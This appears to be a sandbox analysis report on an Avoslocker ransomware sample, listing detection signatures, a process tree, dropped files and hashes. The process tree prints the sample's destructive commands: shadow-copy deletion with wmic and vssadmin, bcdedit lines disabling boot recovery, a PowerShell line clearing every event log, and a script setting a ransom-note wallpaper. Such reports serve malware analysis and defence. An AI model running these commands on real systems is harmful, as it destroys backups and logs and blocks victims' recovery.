Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    29-12-2024 05:06

General

  • Target

    test.exe

  • Size

    1.6MB

  • MD5

    e02f95741041a4da9ca26d2f20fc28da

  • SHA1

    91555f9e13ab54363f3f4f129cdadb6c225b6c20

  • SHA256

    62a9b760a2f94f4e1be8784e5d8394bb76e9981a4ae2426237e5b6fdf4538c9a

  • SHA512

    921aea6afc16d4036a14b8ad5d7f268d29405979ef83b9b94c0023a9721735b6d7e1ce461c31d5b230c6160906f61f703e73637cf1197b9584bf816617ea3ec1

  • SSDEEP

    24576:/Imw98okVgela0as5CqLVO7XJCjkD3N0HRADV0aEhbHdn0TrldepPZ:ZL5ljasaU4eaEhDF

Malware Config

Signatures

  • Avoslocker Ransomware

    Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.

  • Avoslocker family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (10428) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\test.exe
    "C:\Users\Admin\AppData\Local\Temp\test.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Users\Admin\AppData\Local\Temp\Firefox Installer.exe
      "C:\Users\Admin\AppData\Local\Temp\Firefox Installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3036
      • C:\Users\Admin\AppData\Local\Temp\7zSCDBC2CE6\setup-stub.exe
        .\setup-stub.exe
        3⤵
          PID:580
      • C:\Users\Admin\AppData\Local\Temp\hack.exe
        "C:\Users\Admin\AppData\Local\Temp\hack.exe"
        2⤵
        • Executes dropped EXE
        • Drops desktop.ini file(s)
        • Enumerates connected drives
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3040
        • C:\Windows\system32\cmd.exe
          cmd /c wmic shadowcopy delete /nointeractive
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2220
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic shadowcopy delete /nointeractive
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3664
        • C:\Windows\system32\cmd.exe
          cmd /c vssadmin.exe Delete Shadows /All /Quiet
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2344
          • C:\Windows\system32\vssadmin.exe
            vssadmin.exe Delete Shadows /All /Quiet
            4⤵
            • Interacts with shadow copies
            PID:2040
        • C:\Windows\system32\cmd.exe
          cmd /c bcdedit /set {default} recoveryenabled No
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2732
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} recoveryenabled No
            4⤵
            • Modifies boot configuration data using bcdedit
            PID:3672
        • C:\Windows\system32\cmd.exe
          cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2864
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} bootstatuspolicy ignoreallfailures
            4⤵
            • Modifies boot configuration data using bcdedit
            PID:2312
        • C:\Windows\system32\cmd.exe
          cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2880
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3656
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:544
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1381006787.png /f
            4⤵
            • Sets desktop wallpaper using registry
            PID:3192
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
            4⤵
              PID:4700
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2956

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\GET_YOUR_FILES_BACK.txt

        Filesize

        1011B

        MD5

        c92c2b70fb37f84aab38412ad9226aa8

        SHA1

        14f2e9a83285612d0a7b2c83b8f89bccfde6c154

        SHA256

        d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f

        SHA512

        04f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848

      • C:\Users\Admin\AppData\Local\Temp\1381006787.png

        Filesize

        32KB

        MD5

        1102d805d581b2642cec9945747c8968

        SHA1

        272aa475615770fe25968fc1787353ca08c89953

        SHA256

        59fde654769fa30863cfb5ae13b21c5adb797f59d810471ea47cf46c2f0dacc0

        SHA512

        aa3b456f24f541a9408653984d8916ba7e6eb7c18f3e0a054f01836c4ec0bfd3c186e7369a077adef7ee73b5452b3ad87b8a3b338aebe5482171e5fdbf1b54c0

      • C:\Users\Admin\AppData\Local\Temp\Firefox Installer.exe

        Filesize

        364KB

        MD5

        530894a1f0eb42c7837db4d74829f5c6

        SHA1

        99909db6f574ca964a9b822b9b19fd2e851b8c1e

        SHA256

        aac3ce797f50e0a5b9f1b43aaaffb439d4c42e3cf5b9fbeac52fa3d263fde3d0

        SHA512

        0836dd919c5f5648ce3445f9a3c84afe5e1e694ff998f1204498b2a86b13ed297469bea88af0ad7e49c97cd57153c7c43fd0a311b4c2685f4dfca5574d1d10f0

      • C:\Users\Admin\AppData\Local\Temp\hack.exe

        Filesize

        807KB

        MD5

        e27b5291c8fb2dfdeb7f16bb6851df5e

        SHA1

        40207f83b601cd60905c1f807ac0889c80dfe33f

        SHA256

        ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f

        SHA512

        2ddbc50cd780ffbf73c354b9b437322eb49cb05bb6f287d54e7dcafb61dc4c4549e37ae2f972f3d240bfa7d2ca485b7583137f1bf038bc901f378cea0c305c6a

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        da6b93db76d453a8e641e24c31063827

        SHA1

        733f375eedae1db225cb518c0e30759fe29199de

        SHA256

        a860951efed46c7d61e509429ca6ca1ed6a1517c5fba9fe0103f43445a28e5c9

        SHA512

        6640a8dea7b8b7269431df680cdb9dabadf3b6f98ac569711e6b3468113b28e5065939016ed28eb885bac1286d7e35a6487372afc62f3046aa0aba19af0fb318

      • \Users\Admin\AppData\Local\Temp\7zSCDBC2CE6\setup-stub.exe

        Filesize

        630KB

        MD5

        ea482758c49d3c0064c6a40e797ab046

        SHA1

        e93f077ca6fd640e28eb9bd692f44d57ed96fa1a

        SHA256

        8c6eb21ff36dcb4b2adcf556039a9ef518a3e25a1fa02bd2b8d5d8ecd344d06c

        SHA512

        f950457146fa6de0eddfb8219b782f019d97b45a6b2d6fb66e6f3fed28b62a15c86cd22c96a3e402b06c6bb7f14c923925e2abb7e49422dcc7e2b681b7c1c3da

      • memory/544-24625-0x0000000001E10000-0x0000000001E18000-memory.dmp

        Filesize

        32KB

      • memory/544-24624-0x000000001B5B0000-0x000000001B892000-memory.dmp

        Filesize

        2.9MB

      • memory/2904-9-0x000000013FB60000-0x000000013FCF9000-memory.dmp

        Filesize

        1.6MB

      • memory/3036-19-0x0000000000400000-0x0000000000446000-memory.dmp

        Filesize

        280KB

      • memory/3036-12-0x0000000000400000-0x0000000000446000-memory.dmp

        Filesize

        280KB

      • memory/3656-1296-0x0000000002770000-0x0000000002778000-memory.dmp

        Filesize

        32KB

      • memory/3656-954-0x000000001B770000-0x000000001BA52000-memory.dmp

        Filesize

        2.9MB